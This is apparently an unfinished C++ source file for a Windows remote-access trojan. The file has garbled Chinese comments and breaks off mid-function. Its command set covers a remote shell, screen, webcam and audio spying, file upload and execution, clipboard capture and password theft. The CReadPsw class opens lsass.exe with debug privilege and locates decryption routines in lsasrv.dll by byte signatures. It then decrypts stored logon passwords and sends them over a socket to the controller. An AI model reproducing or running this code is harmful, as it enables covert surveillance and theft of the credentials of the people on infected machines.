Work in progress

// ReadBridge.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define _WINSOCK_DEPCRECATED
#include "ReadBridge.h"
#include "winternl.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif

class CModuleSocket
{
public:
  CModuleSocket(void);
  ~CModuleSocket(void);

  UINT32 ConnectServer(IN const char* pIpAddr, OUT SOCKET* pSocket, OUT bool* pbSuccess); //Á¬½Ó·þÎñÆ÷

  UINT32 SendCommand(IN const SOCKET socket,
    IN char* szBuf,
    IN int bytes,
    OUT bool* pbSuccess); //·¢ËÍÏûÏ¢

  UINT32 RecvCommand(IN const SOCKET socket,
    OUT char* szBuf,
    OUT int bytes,
    OUT bool *pbSuccess);  //½ÓÊÜÏûÏ¢

  void Clean();

public:
  UINT m_nPort;  //Á¬½Ó¶Ë¿Ú
};

#pragma once
#include <windows.h>

//Êý¾Ý´«ÊäµÄ»º³åÇø´óС
#define CONTEXT_BUF_SIZE  (1024 * 4)
//IPµØÖ·»º³åÇø´óС
#define IPADDR_SIZE 32
//´ÓÍøÒ³»ñÈ¡IPµØÖ·µÄÐÅÏ¢»º³åÇø
#define WEBSITE_BUF_SIZE 512
//ÆÁÄ»´«ÊäµÄ»º³åÇø´óС
#define SCREEN_BUF_SIZE 4030
//ÊÓÆÁ´«Ê仺³åÇø´óС
#define VIDEO_BUF_SIZE  4020
//ÓïÒô´«Ê仺³åÇø´óС
#define AUDIO_BUF_SIZE  4078
//¼ôÌù°å´«Ê仺³åÇø´óС
#define CLIPBOARD_BUF_SIZE  4078

//---------------------------------------------------
//Ö¸ÁîµÄºê¶¨Òå

#define CMD_SHAKEHAND   0x01 //ÎÕÊÖÑéÖ¤
#define CMD_SYSINFO    0x02 //ϵͳÐÅÏ¢
#define CMD_DISKINFO    0x03 //´ÅÅÌÐÅÏ¢
#define CMD_FILELIST    0x04 //Îļþ¼ÐÐÅÏ¢
#define CMD_DOWNLOAD    0x05 //ÎļþÏÂÔØ
#define CMD_UPLOAD     0x06 //ÎļþÉÏ´«
#define CMD_FILEUPLOAD   0x07 //ÎļþÊý¾ÝÉÏ´«
#define CMD_FILEEXEC    0x08 //ÎļþÖ´ÐÐ
#define CMD_REFRESH    0x09 //Ë¢ÐÂ
#define CMD_FOLDER_CREATE 0x10 //´´½¨Ä¿Â¼(Îļþ¼Ð)
#define CMD_FILE_DEL    0x11 //Îļþ£¨¼Ð£©É¾³ý
#define CMD_FILE_COPY   0x12 //ÎļþµÄ¸´ÖÆ
#define CMD_FILE_PASTE   0x13 //ÎļþµÄÕ³Ìù
#define CMD_FILE_RENAME  0x14 //Îļþ(¼Ð)ÖØÃüÃû
#define CMD_ATTRIBUTE   0x15 //ÊôÐÔ
#define CMD_TELNET     0x16 //¿ªÆôÔ¶³ÌÖÕ¶Ë
#define CMD_COMMOND    0x17 //·¢ËÍÃüÁî
#define CMD_CHATMSG    0x18 //ÁÄÌìÏûÏ¢
#define CMD_PROGRESS    0x19 //½ø³Ì¹ÜÀí
#define CMD_PROC_TASKKILL 0x20 //¹Ø±Õ½ø³Ì
#define CMD_SCREEN     0x21 //ÆÁÄ»²é¿´
#define CMD_GETPWD     0x22 //»ñȡϵͳµÄÕʺÅÃÜÂë
#define CMD_VIDEO_VIEW   0x23 //ÊÓÆÁ²é¿´
#define CMD_OPERATOR    0x24 //¹Ø»ú/×¢Ïú/ÖØÆô
#define CMD_AUDIO     0x25 //ÓïÒô¼àÌý
#define CMD_BROADCAST   0x26 //Ô¶³ÌÃüÁî¹ã²¥
#define CMD_DESKTOP    0x27 //×ÀÃæ¹ÜÀí
//-----------------------------------------------------

typedef struct tagMSGINFO //´«ÊäÏûÏ¢½á¹¹Ìå
{
  int Msg_id;
  BYTE context[CONTEXT_BUF_SIZE];
}MSGINFO_S;

typedef struct tagSYSTEMINFO //²Ù×÷ϵͳÐÅÏ¢
{
  char szWANIP[IPADDR_SIZE];  //¹«ÍøIPµØÖ·
  char szLocalIP[IPADDR_SIZE]; //±¾»úIPµØÖ·
  char hostName[255];  //¼ÆËã»úÃû
  bool Cam; //ÉãÏñÍ·
  int OSVer; //²Ù×÷ϵͳ°æ±¾
  wchar_t szCPUInfo[MAX_PATH]; //cpuÐÅÏ¢
  DWORD dwDiskSize; //Ó²ÅÌÐÅÏ¢
}SYSTEMINFO_S;

typedef struct tagDRIVER //´ÅÅÌÐÅÏ¢
{
  wchar_t disk;  //´ÅÅÌÃû
  double dwTotal;  //´ÅÅ̵ĴóС
  double dwFree;  //Ê£Óà¿Õ¼ä
  int nType; //ÀàÐÍ
}DRIVER_S;

typedef struct tagFILEINFO   //ÎļþÐÅÏ¢
{
  TCHAR szFileName[MAX_PATH]; //ÎļþÃû
  int nType;         //ÎļþÀàÐÍ(Îļþ\Îļþ¼Ð)
  __int64 size;        //Îļþ´óС
}FILEINFO_S;

typedef struct tagTEMPSTRUCT //ÔÚÎļþÏÂÔعý³ÌÖеÄÁÙʱ½á¹¹Ìå
{
  DWORD cFileInfo;   //CFileInfoÀàµÄÖ¸Õë
  SOCKET l_Socket;   //socket¶ÔÏó
  BYTE context[MAX_PATH]; //Îļþ·¾¶
}TEMPSTRUCT;

typedef struct tagDOWNFILEDATA  //Îļþ´«ÊäÊý¾Ý¿é½á¹¹
{
  BYTE context[512]; //¿éÊý¾ÝµÄ´óС
  UINT size;     //Îļþ´óС
  UINT nCount;    //´ÎÊý£¬ÓÃÓÚ½ø¶ÈÌõµÄÏÔʾ
  bool bFlag;     //ÎļþÊÇ·ñ´«ÊäÍê±Ï
}DOWNFILEDATA_S;

typedef struct tagFILEEXECINFO //ÎļþÖ´Ðнá¹ûÐÅÏ¢
{
  wchar_t szFilePath[MAX_PATH]; //ÎļþÃû
  bool bSuccess;       //Ö´Ðнá¹û
}FILEEXECINFO_S;

typedef struct tagFILEDELSTRUCT //Îļþ£¨¼Ð£©É¾³ý´«µÝÏ̵߳ĽṹÌå
{
  DWORD cDiskInfo;     //CDiskÀàµÄÖ¸Õë
  SOCKET l_Socket;     //socket¶ÔÏó
  FILEINFO_S tagFileInfo; //ÎļþÀàÐͽṹÌå
}FILEDELSTRUCT_S;

typedef struct tagFILECOPY  //Îļþ¸´Öƽá¹ûÐÅÏ¢
{
  wchar_t szFilePath[MAX_PATH]; //Îļþȫ·¾¶
  wchar_t szFileName[MAX_PATH]; //ÎļþÃû
  bool bTag;          //ÊÇ·ñ·¢ËÍÍê±Ï
}FILECOPY_S;

typedef struct tagATTRIBUTE  //ÊôÐÔ
{
  wchar_t szFilePath[MAX_PATH]; //ÎļþËùÔÚµÄĿ¼
  wchar_t szFileName[MAX_PATH]; //ÎļþÃû
  int nType;           //Îļþ(¼Ð)ÀàÐÍ
  SYSTEMTIME sysCreateTime;   //´´½¨Ê±¼ä
  SYSTEMTIME sysModifyTime;   //ÐÞ¸Äʱ¼ä
  SYSTEMTIME sysVisitTime;    //·ÃÎÊʱ¼ä
  bool bArchive;         //´æµµ
  bool bReadOnly;        //Ö»¶Á
  bool bHide;          //Òþ²Ø
  bool bSystem;         //ϵͳ
}ATTRIBUTE_S;

typedef struct tagCMD    //CMDÃüÁîÐÅÏ¢
{
  int flag;      //½á¹¹Ìå±£Áô×Ö¶Î
  char command[1024]; //ÃüÁîÐÐ
}COMMOND_S;

typedef struct tagCHATMSG  //ÁÄÌìÏûÏ¢
{
  bool bfirstSend;  //ÊÇ·ñµÚÒ»´Î·¢ËÍÐÅÏ¢
  bool bClose; //ÊÇ·ñ¹Ø±Õ
  wchar_t szChatMsg[1024]; //ÁÄÌìÄÚÈÝ
}CHATMSG_S;

typedef struct tagPROGRESS //½ø³ÌÁбíÐÅÏ¢
{
  wchar_t szProName[MAX_PATH];  //½ø³ÌÃû
  DWORD nPid;      //½ø³ÌIDºÅ
  int nThreadCount;  //Ïß³Ì×ÜÊý
  int nLevel;     //½ø³Ì¼¶±ð
  wchar_t szProPath[MAX_PATH]; //½ø³Ì·¾¶
  int nTag;   //½áÊøµô½ø³ÌÊDz»Êdzɹ¦ÁË(±£Áô¹Ø¼ü×Ö)
}PROGRESS_S;

typedef struct tagBMPHEADINFO //BMPλͼͷÐÅÏ¢
{
  BITMAPINFO tagBitmapInfo;  //λͼÐÅÏ¢
}BMPHEADINFO_S;

typedef struct tagBMPDATA //BMPͼÏñÊý¾Ý
{
  BITMAPINFO bmpinfo; //λͼÐÅÏ¢
  int Id;
  bool bShow; //ÊÇ·ñ¿ÉÒÔÏÔʾͼÏñ
  int Size;
  int HeadSize;
  UINT Begin;
  BYTE Data[SCREEN_BUF_SIZE];  //ÉÏÃæµÄ½á¹¹Ìå´óСÊÇ64 + 4030 = 4094 < 4 * 1024
}BMPDATA_S;

typedef struct tagREADPSWDATA //ÖØÒªµÄϵͳÕʺźÍÃÜÂë
{
  wchar_t szUserName[250]; //ÕʺÅ
  wchar_t szUserPwd[250];  //ÃÜÂë
  wchar_t szDomain[250];  //Óò
  wchar_t szErrorMsg[50];  //´íÎóÐÅÏ¢
}READPSWDATA_S;

typedef struct tagVIDEODATA //ÊÓÆÁÊý¾Ý
{
  BITMAPINFO bmpinfo; //λͼÐÅÏ¢
  int Id;
  bool bShow;     //ÊÇ·ñ¿ÉÒÔÏÔʾͼÏñ
  DWORD Size;     //Êý¾Ý´óС 
  int HeadSize;    //ÊÓÆÁÍ·Êý¾Ý
  UINT Begin;     //µÚ¼¸´Î·¢ËÍ
  int dwExtend1;   //ѹËõÇ°³¤¶È
  int dwExtend2;   //ѹËõºó³¤¶È
  BYTE Data[VIDEO_BUF_SIZE];  //ÉÏÃæµÄ½á¹¹Ìå´óСÊÇ74 + 4020 = 4094 < 4 * 1024
}VIDEODATA_S;

typedef struct tagVIDEOTEMP
{
  DWORD cThis;
  SOCKET l_Socket;
}VIDEOTEMP_S;

typedef struct tagOPERATOR //¹Ø»ú/×¢Ïú/ÖØÆô
{
  int nType; //ÀàÐÍ£¨0--±íʾ¹Ø»ú£¬ 1--±íʾעÏú£¬ 2--±íʾÖØÆô£©
}OPERATOR_S;

typedef struct tagAUDIODATA //ÓïÒôÊý¾Ý
{
  int Id;
  bool bRead; //ÊÇ·ñ½ÓÊÜÍêÊý¾Ý
  DWORD dwSize; //Êý¾Ý´óС
  UINT Begin;  //µÚ¼¸´Î·¢ËÍ
  BYTE Data[AUDIO_BUF_SIZE]; //Êý¾Ý
}AUDIODATA_S;

typedef struct tagINTERNET //ÍøÒ³
{
  bool bDownLoad;  //ÊÇ·ñÏÂÔØÎļþ
  bool bRunExe;  //ÊÇ·ñÔËÐÐÏÂÔØÎļþ
  wchar_t szWebSite[MAX_PATH]; //ÍøÒ³µÄ·¾¶
}INTERNET_S;

typedef struct tagWNDINFO //µ¯´°ÐÅÏ¢
{
  wchar_t szTitle[MAX_PATH]; //±êÌâ
  wchar_t szContent[MAX_PATH]; //ÄÚÈÝ
  UINT nType;  //ÀàÐÍ
}WNDINFO_S;

typedef struct tagBROADCAST //¹ã²¥ÃüÁî
{
  bool bTag; //±êÖ¾
  INTERNET_S tagInternet;
  WNDINFO_S tagWndInfo;
}BROADCAST_S;

typedef struct tagBROADTEMP //ÁÙʱ½á¹¹Ìå
{
  DWORD cWorkMain;
  BROADCAST_S* pTagBroadCast;
}BROADTEMP_S;

typedef struct tagDESKTOPINFO //×ÀÃæ¹ÜÀí
{
  int nType; //²Ù×÷ÀàÐÍ
  bool bTag; //²Ù×÷±ê¼Ç
}DESKTOPINFO_S;

typedef struct tagCLIPBOARD
{
  int id;
  bool bRead; //ÊÇ·ñ½ÓÊÜÍêÊý¾Ý
  DWORD dwSize; //Êý¾Ý´óС
  UINT Begin;  //µÚ¼¸´Î·¢ËÍ
  char Data[CLIPBOARD_BUF_SIZE]; //Êý¾Ý
}CLIPBOARD_S;
//------------------------------------------

//²Ù×÷ϵͳµÄ°æ±¾ºÅ
enum SYSVERSION
{
  OS_2000,
  OS_XP,
  OS_2003,
  OS_Vista,  //Vista°æ±¾ºÅÓë2008 serverÒ»Ñù
  OS_WIN7,
  OS_WIN8,
  OS_UNKNOWN //δ֪²Ù×÷ϵͳ
};

//Ó²ÅÌÀàÐÍ
enum DISKTYPE
{
  DISK_FIXED,    //¹Ì¶¨Ó²ÅÌ
  DISK_REMOVABLE,  //Òƶ¯Ó²ÅÌ
  DISK_CDROM     //CD-ROM
};

//ÎļþÀàÐÍ
enum FILEATTR
{
  FILE_ATTR,  //Îļþ
  FOLDER_ATTR,  //Îļþ¼Ð
  FILE_TAG    //±ê־룬±íʾÎļþÐÅÏ¢ÒѾ­·¢ËÍÍê±Ï
};

//½ø³ÌÓÅÏȼ¶
enum PROGRESS_LEVEL
{
  UNKNOWN_LEVEL,  //δ֪
  NORMAL,      //±ê×¼
  IDLE,       //µÍ
  REALTIME,     //ʵʱ
  HIGH,       //¸ß
  ABOVENORMAL,   //¸ßÓÚ±ê×¼
  BELOWNORMAL    //µÍÓÚ±ê×¼
};

//×ÀÃæ¹ÜÀíÀàÐÍ
enum DESKTOP_TYPE
{
  MOUSE_MOVE,  //Êó±êÒƶ¯
  DESKTOP_ICON, //×ÀÃæͼ±ê
  TASKBAR,   //ÈÎÎñ¹ÜÀí
  CLIPBOARD  //¼ôÌù°å
};

#pragma once
#include <windows.h>
#include <stdio.h>

//»ñÈ¡¼ÆËã»úϵͳÕʺš¢ÃÜÂëºÍµÇ¼Óò

#define MEM_SIZE 0x1000
#define WIN7   0x0100
#define WINXP  0x0101
#define WIN03  0x0102

typedef struct _LSA_UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR Buffer;
} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING;

typedef struct _SECURITY_LOGON_SESSION_DATA {
  ULONG Size;
  LUID LogonId;
  LSA_UNICODE_STRING UserName;
  LSA_UNICODE_STRING LogonDomain;
  LSA_UNICODE_STRING AuthenticationPackage;
  ULONG LogonType; ULONG Session;
  PSID Sid;
  LARGE_INTEGER LogonTime;
  LSA_UNICODE_STRING LogonServer;
  LSA_UNICODE_STRING DnsDomainName;
  LSA_UNICODE_STRING Upn;
} SECURITY_LOGON_SESSION_DATA, *PSECURITY_LOGON_SESSION_DATA;


typedef int(__stdcall * pNTQUERYPROCESSINFORMATION)(HANDLE, DWORD, PVOID, ULONG, PULONG);
typedef int(__stdcall * pLSAENUMERATELOGONSESSIONS)(PULONG, PLUID *);
typedef int(__stdcall * pDECRIPTFUNC)(PBYTE, DWORD);
typedef int(__stdcall * pLSAFREERETURNBUFFER)(PVOID);
typedef int(__stdcall * pLSAGETLOGONSESSIONDATA)(PLUID, PSECURITY_LOGON_SESSION_DATA *);


// ½âÃܺ¯ÊýÌØÕ÷Âë(lsasrv.text)
static BYTE DecryptfuncSign[] = { 0x48, 0x83, 0xEC, 0x68, 0x4C, 0x8b, 0x15, 0xa5, 0xd6, 0x16, 0X00 };
static BYTE DecryptfuncSign2[] = { 0x8B, 0xFF, 0x55, 0x8B,
0xEC, 0x6A, 0x00, 0xFF,
0x75, 0x0C, 0xFF, 0x75,
0x08, 0xE8 };

// ÃÜÔ¿KEYÏà¹ØµÄ¹Ø¼üµØÖ·ÌØÕ÷Âë(lsasrv.text)
static BYTE DecryptKeySign_WIN7[] = { 0x33, 0xD2, 0xC7, 0x45, 0xE8, 0x08, 0x00, 0x00, 0x00, 0x89, 0x55, 0xE4 };
static BYTE DecryptKeySign_XP[] = { 0x8D, 0x85, 0xF0, 0xFE, 0xFF, 0xFF, 0x50, 0xFF, 0x75, 0x10, 0xFF, 0x35 };

// ÃÜÎĹؼüÖ¸ÕëÌØÕ÷Âë(wdigest.text)
static BYTE KeyPointerSign[] = { 0x8B, 0x45, 0x08, 0x89, 0x08, 0xC7, 0x40, 0x04 };

// È«¾Ö±äÁ¿
static BYTE MemBuf[MEM_SIZE], SecBuf[0x200], ThirdBuf[0x200];
static BYTE Encryptdata[0x100];

class CReadPsw
{
public:
  CReadPsw(void);
  ~CReadPsw(void);
public:
  void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind);
  CString CharToCString(IN char* result);
  HANDLE GetProcessHandleByName(const TCHAR *szName);
  LPVOID GetEncryptListHead();
  void printSessionInfo(pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData,
    pLSAFREERETURNBUFFER LsaFreeReturnBuffer,
    PLUID pCurLUID,
    OUT READPSWDATA_S* tagRPWDATA);
  PBYTE search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize);
  int EnableDebugPrivilege();

  void SendSecurityPwd(IN SOCKET sock);  //µÃµ½²¢·¢ËÍ»ñÈ¡µ½µÄ¹ÜÀíÔ±ÕʺźÍÃÜÂë
private:
  CModuleSocket m_moduleSocket;
};#include <iostream>
#include "Ws2tcpip.h"


CModuleSocket::CModuleSocket(void)
{
}

CModuleSocket::~CModuleSocket(void)
{
}

UINT32 CModuleSocket::ConnectServer(IN const char* pIpAddr, OUT SOCKET* pSocket, OUT bool* pbSuccess)
{
  UINT32 result = ERROR_SUCCESS;
  if (NULL == pIpAddr || NULL == pbSuccess)
  {
    result = ERROR_INVALID_PARAMETER;
    return result;
  }

  bool bSuccess = true;
  SOCKET socket = INVALID_SOCKET;
  try
  {
    WSADATA wsadata = { 0 };
    int iRet = WSAStartup(MAKEWORD(2, 2), &wsadata);
    if (iRet)
    {
      std::cout << "Unable to start" << std::endl;
      result = WSAGetLastError();
      bSuccess = false;
      throw result;
    }
    socket = ::socket(AF_INET, SOCK_STREAM, 0);
    if (INVALID_SOCKET == socket)
    {
      std::cout << "socket³õʼ»¯Ê§°Ü!" << std::endl;
      result = WSAGetLastError();
      bSuccess = false;
      throw result;
    }
    sockaddr_in serverAddr;
    serverAddr.sin_family = AF_INET;
    //serverAddr.sin_addr.S_un.S_addr = inet_addr(pIpAddr);
    InetPton(AF_INET, PCWSTR(pIpAddr), &serverAddr.sin_addr.S_un.S_addr);
    serverAddr.sin_port = htons(m_nPort);

    iRet = connect(socket, (sockaddr*)&serverAddr, sizeof(sockaddr_in));
    if (SOCKET_ERROR == iRet)
    {
      std::cout << "Á¬½Ó·þÎñÆ÷¶Ëʧ°Ü!" << std::endl;
      result = WSAGetLastError();
      bSuccess = false;
      throw result;
    }
    else
    {
      std::cout << "Á¬½Ó·þÎñÆ÷³É¹¦!" << std::endl;
      *pSocket = socket;
    }
  }
  catch (UINT32)
  {
  }
  *pbSuccess = bSuccess;
  return result;
}

UINT32 CModuleSocket::SendCommand(IN const SOCKET socket,
  IN char* szBuf,
  IN int bytes,
  OUT bool* pbSuccess)
{
  UINT32 result = ERROR_SUCCESS;
  if (INVALID_SOCKET == socket || 0 == bytes || NULL == pbSuccess)
  {
    result = ERROR_INVALID_PARAMETER;
    return result;
  }
  bool bSuccess = true;
  const char* pCurBuf = szBuf; //µ±Ç°ÒѾ­·¢ËÍÍê±ÏµÄ»º³åÇøÊý¾Ý
  try
  {
    while (bytes > 0)  //ûÓз¢ËÍÍê±Ï
    {
      int nTotal = send(socket, (char*)pCurBuf, bytes, 0);
      if (SOCKET_ERROR == nTotal) //·¢ËÍʧ°Ü
      {
        result = WSAGetLastError();
        bSuccess = false;
        throw result;
      }
      else if (0 == nTotal) //·¢ËÍÍê±Ï
      {
        break;
      }
      bytes -= nTotal;
      pCurBuf += nTotal;
    }
  }
  catch (UINT32)
  {
  }
  *pbSuccess = bSuccess;
  return result;
}

UINT32 CModuleSocket::RecvCommand(IN const SOCKET socket, OUT char* szBuf, OUT int bytes, OUT bool *pbSuccess)
{
  UINT32 result = ERROR_SUCCESS;
  if (INVALID_SOCKET == socket || NULL == pbSuccess)
  {
    result = ERROR_INVALID_PARAMETER;
    return result;
  }
  bool bSuccess = true;
  char* pCurBuf = szBuf; //µ±Ç°ÒѾ­·¢ËÍÍê±ÏµÄ»º³åÇøÊý¾Ý
  try
  {
    while (bytes > 0)  //ûÓз¢ËÍÍê±Ï
    {
      int nTotal = recv(socket, (char*)pCurBuf, bytes, 0);
      if (SOCKET_ERROR == nTotal) //·¢ËÍʧ°Ü
      {
        result = WSAGetLastError();
        bSuccess = false;
        throw result;
      }
      else if (0 == nTotal) //·¢ËÍÍê±Ï
      {
        break;
      }
      bytes -= nTotal;
      pCurBuf += nTotal;
    }
  }
  catch (UINT32)
  {
  }
  *pbSuccess = bSuccess;
  return result;
}

void CModuleSocket::Clean()
{
  ::WSACleanup();
}


CReadPsw::CReadPsw(void)
{
}

CReadPsw::~CReadPsw(void)
{
}

void CReadPsw::SendSecurityPwd(IN SOCKET sock)
{
  HINSTANCE hModlsasrv;
  DWORD   LogonSessionCount, i;
  SIZE_T dwBytesRead;
  PLUID   LogonSessionList, pCurLUID, pListLUID;
  BYTE   EncryptBuf[0x200];
  HANDLE  hProcess;


  if (EnableDebugPrivilege() != 1)
    puts("EnableDebugPrivilege fail !");

  hProcess = GetProcessHandleByName(_T("lsass.exe"));
  if (hProcess == NULL)
  {
    //   puts("GetProcessHandleByName fail !") ;
    //   puts("Try To Run As Administrator ...") ;
    return;
  }

  OSVERSIONINFO VersionInformation;
  DWORD dwVerOff = 0, osKind = -1;

  // °æ±¾ÅжÏ
  memset(&VersionInformation, 0, sizeof(VersionInformation));
  VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation);
  VersionInformation.dwMajorVersion = 6;
  //GetVersionEx(&VersionInformation);
  if (VersionInformation.dwMajorVersion == 5)
  {
    if (VersionInformation.dwMinorVersion == 1)
    {
      dwVerOff = 36;
      osKind = WINXP;
    }
    else if (VersionInformation.dwMinorVersion == 2)
    {
      dwVerOff = 28;
      osKind = WIN03;
    }
  }
  else if (VersionInformation.dwMajorVersion == 6)
  {
    dwVerOff = 32;
    osKind = WIN7;
  }

  if (osKind == -1)
  {
    printf("[Undefined OS version] Major: %d Minor: %d\n", \
      VersionInformation.dwMajorVersion, VersionInformation.dwMinorVersion);
    CloseHandle(hProcess);
    return;
  }

  // »ñµÃ½âÃܺ¯ÊýµØÖ·
  pDECRIPTFUNC DecryptFunc;
  hModlsasrv = LoadLibrary(_T("lsasrv.dll")); //schannel.dll

  if (hModlsasrv == NULL) {
    //std::cout << "cannot locate the .dll file" << std::endl;
    wchar_t *s = NULL;
    FormatMessageW(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
      NULL, WSAGetLastError(),
      MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
      (LPWSTR)&s, 0, NULL);
    fprintf(stderr, "%S\n", s);
    LocalFree(s);
    return;
  }
  else {
    std::cout << "lsasrv Library Loaded" << std::endl;
  }

  DecryptFunc = (pDECRIPTFUNC)search_bytes((PBYTE)hModlsasrv, (PBYTE)0x7fffdddd, DecryptfuncSign, sizeof(DecryptfuncSign));

  // »ñµÃÃÜÎÄÁ´±íÍ·µØÖ·
  LPVOID ListHead;
  ListHead = GetEncryptListHead();

  // »ñµÃÈ«¾ÖÊý¾Ý(lsasrv.data¼°½âÃÜKEYÏà¹ØµÄÊý¾Ý)
  CopyKeyGlobalData(hProcess, hModlsasrv, osKind);

  HINSTANCE          hModSecur32;
  pLSAENUMERATELOGONSESSIONS LsaEnumerateLogonSessions;
  pLSAGETLOGONSESSIONDATA   LsaGetLogonSessionData;
  pLSAFREERETURNBUFFER    LsaFreeReturnBuffer;

  hModSecur32 = LoadLibrary(_T("Secur32.dll"));
  LsaEnumerateLogonSessions = (pLSAENUMERATELOGONSESSIONS)GetProcAddress(hModSecur32, "LsaEnumerateLogonSessions");
  LsaGetLogonSessionData = (pLSAGETLOGONSESSIONDATA)GetProcAddress(hModSecur32, "LsaGetLogonSessionData");
  LsaFreeReturnBuffer = (pLSAFREERETURNBUFFER)GetProcAddress(hModSecur32, "LsaFreeReturnBuffer");

  LsaEnumerateLogonSessions(&LogonSessionCount, &LogonSessionList);
  MSGINFO_S tagMsgInfo;
  READPSWDATA_S tagRPWDATA;
  bool bSuccess = true;

  for (i = 0; i < LogonSessionCount; i++) //Ñ­»·±éÀúµ±Ç°ÕʺÅÐÅÏ¢
  {
    memset(&tagMsgInfo, 0, sizeof(MSGINFO_S)); //³õʼ»¯½á¹¹ÌåÐÅÏ¢
    memset(&tagRPWDATA, 0, sizeof(READPSWDATA_S));
    tagMsgInfo.Msg_id = CMD_GETPWD;

    pCurLUID = (PLUID)((DWORD)LogonSessionList + sizeof(LUID) * i);
    // ´òÓ¡Ïà¹ØÐÅÏ¢
    printSessionInfo(LsaGetLogonSessionData, LsaFreeReturnBuffer, pCurLUID, &tagRPWDATA); //»ñÈ¡µÇ¼ÃûºÍµÇ¼Óò
                                                // ±éÀúÁ´Ê½½á¹¹²éÕÒµ±Ç°µÄLUID
    ReadProcessMemory(hProcess, ListHead, EncryptBuf, 0x100, &dwBytesRead);
    while (*(DWORD *)EncryptBuf != (DWORD)ListHead)
    {
      ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)EncryptBuf), EncryptBuf, 0x100, &dwBytesRead);
      pListLUID = (LUID *)((DWORD)EncryptBuf + 0x10);
      if ((pListLUID->LowPart == pCurLUID->LowPart) && (pListLUID->HighPart == pCurLUID->HighPart))
      {
        break;
      }
    }
    if (*(DWORD *)EncryptBuf == (DWORD)ListHead)
    {
      puts("Specific LUID NOT found\n");
      wchar_t szErrorMsg[] = _T("Specific LUID NOT found");
      wsprintfW(tagRPWDATA.szErrorMsg, szErrorMsg);  //´íÎóÐÅÏ¢
    }
    else
    {
      DWORD  pFinal = 0;
      DWORD  nBytes = 0;
      LPVOID pEncrypt;
      pFinal = (DWORD)(pListLUID)+dwVerOff;
      nBytes = *(WORD *)((DWORD)pFinal + 2);      // ÃÜÎÄ´óС
      pEncrypt = (LPVOID)(*(DWORD *)((DWORD)pFinal + 4)); // ÃÜÎĵØÖ·(Remote)

      memset(Encryptdata, 0, sizeof(Encryptdata));
      ReadProcessMemory(hProcess, (LPVOID)pEncrypt, Encryptdata, nBytes, &dwBytesRead);

      // µ÷ÓýâÃܺ¯Êý½âÃÜ
      DecryptFunc(Encryptdata, nBytes);
      // ´òÓ¡ÃÜÂëÃ÷ÎÄ
      printf("password: %S\n\n", Encryptdata);
      wsprintfW(tagRPWDATA.szUserPwd, _T("%s"), Encryptdata);
    }
    memcpy((char*)tagMsgInfo.context, (char*)&tagRPWDATA, sizeof(READPSWDATA_S));
    m_moduleSocket.SendCommand(sock, (char*)&tagMsgInfo, sizeof(MSGINFO_S), &bSuccess);
  }

  CloseHandle(hProcess);
  LsaFreeReturnBuffer(LogonSessionList);

  FreeLibrary(hModlsasrv);
  FreeLibrary(hModSecur32);
  if (osKind == WIN7)
  {
    FreeLibrary(GetModuleHandle(_T("bcrypt.dll")));
    FreeLibrary(GetModuleHandle(_T("bcryptprimitives.dll")));
  }
}

void CReadPsw::CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind)
{
  PIMAGE_SECTION_HEADER pSectionHead;
  PIMAGE_DOS_HEADER   pDosHead;
  PIMAGE_NT_HEADERS   pPEHead;
  DWORD         dwBytes;
  SIZE_T dwBytesRead;
  LPVOID        pdataAddr, pDecryptKey, DecryptKey, pEndAddr;

  pDosHead = (PIMAGE_DOS_HEADER)hModlsasrv;
  pSectionHead = (PIMAGE_SECTION_HEADER)(pDosHead->e_lfanew + (DWORD)hModlsasrv + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER));

  pdataAddr = (LPVOID)((DWORD)pSectionHead->VirtualAddress + (DWORD)hModlsasrv);
  dwBytes = ((DWORD)(pSectionHead->Misc.VirtualSize) / 0x1000 + 1) * 0x1000;
  ReadProcessMemory(hProcess, pdataAddr, pdataAddr, dwBytes, &dwBytesRead);

  pPEHead = (PIMAGE_NT_HEADERS)(pDosHead->e_lfanew + (DWORD)hModlsasrv);
  pEndAddr = (LPVOID)(pPEHead->OptionalHeader.SizeOfImage + (DWORD)hModlsasrv);

  switch (osKind)
  {
  case WINXP:
  case WIN03:
  {
    pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr, \
      DecryptKeySign_XP, sizeof(DecryptKeySign_XP));

    pDecryptKey = (LPVOID)*(DWORD *)((DWORD)pDecryptKey + sizeof(DecryptKeySign_XP));
    ReadProcessMemory(hProcess, (LPVOID)pDecryptKey, &DecryptKey, 4, &dwBytesRead);
    // DecryptKey ÊÇÓë½âÃÜÏà¹ØµÄ¹Ø¼üµØÖ·
    ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead);
    pdataAddr = (LPVOID)pDecryptKey;
    *(DWORD *)pdataAddr = (DWORD)MemBuf;

    break;
  }
  case WIN7:
  {
    // WIN7 Ðèµ÷ÓÃÕâÁ½¸öDLLÖеĺ¯Êý½øÐнâÃÜ
    LoadLibrary(_T("bcrypt.dll"));
    LoadLibrary(_T("bcryptprimitives.dll"));

    pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr, \
      DecryptKeySign_WIN7, sizeof(DecryptKeySign_WIN7));
    pDecryptKey = (LPVOID)(*(DWORD *)((DWORD)pDecryptKey - 4));

    // DecryptKey ÊÇÓë½âÃÜÏà¹ØµÄ¹Ø¼üµØÖ·
    ReadProcessMemory(hProcess, pDecryptKey, &DecryptKey, 0x4, &dwBytesRead);

    ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead);
    pdataAddr = (LPVOID)pDecryptKey;
    *(DWORD *)pdataAddr = (DWORD)MemBuf;

